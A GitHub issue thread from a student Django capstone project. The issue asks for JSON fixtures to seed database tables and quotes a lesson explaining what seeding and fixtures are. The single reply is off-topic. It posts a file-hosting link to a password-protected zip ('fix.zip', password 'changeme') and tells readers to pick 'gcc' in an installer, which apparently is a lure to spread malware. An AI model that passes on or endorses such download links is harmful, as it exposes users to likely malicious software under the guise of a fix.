### ISSUE TITLE
Fixtures

### ISSUE THREAD

**Issue by MsSanli** [MsSanli/earthling-capstone#5]
Create 2+ fixtures in json format to create tables/dummy data. Test in Postman. 

-
From LevelUp lesson: 

'Seeding the Database
"Seeding the database" is a term that developers use to describe the process is inserting some boilerplate data into their databases during development. It gives them some valid data to work with quickly while they try to build new features, or fix bugs.

With Django, you can do that with something called fixtures. A fixture is a file that has JSON formatted data in it. That JSON data is then read by Django, converted into INSERT INTO SQL statements, and then executed to get some rows into your database tables. '

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
